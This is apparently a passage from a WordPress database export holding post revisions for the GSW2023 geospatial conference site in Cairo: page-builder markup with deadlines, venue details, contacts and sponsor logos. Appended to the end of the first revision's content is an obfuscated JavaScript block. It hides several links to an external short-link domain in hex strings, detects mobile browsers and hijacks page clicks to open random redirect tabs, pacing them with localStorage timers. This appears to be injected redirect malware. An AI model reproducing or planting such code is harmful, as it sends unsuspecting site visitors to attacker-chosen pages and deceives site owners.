icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1682772322645{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023,at the InterContinental Cairo Semiramis,Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-16 01:43:56','2023-05-16 01:43:56','',3066,'https://gsw2023.com/?p=4492',0,'revision','',0),
(4493,1,'2023-05-16 01:44:11','2023-05-16 01:44:11','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" 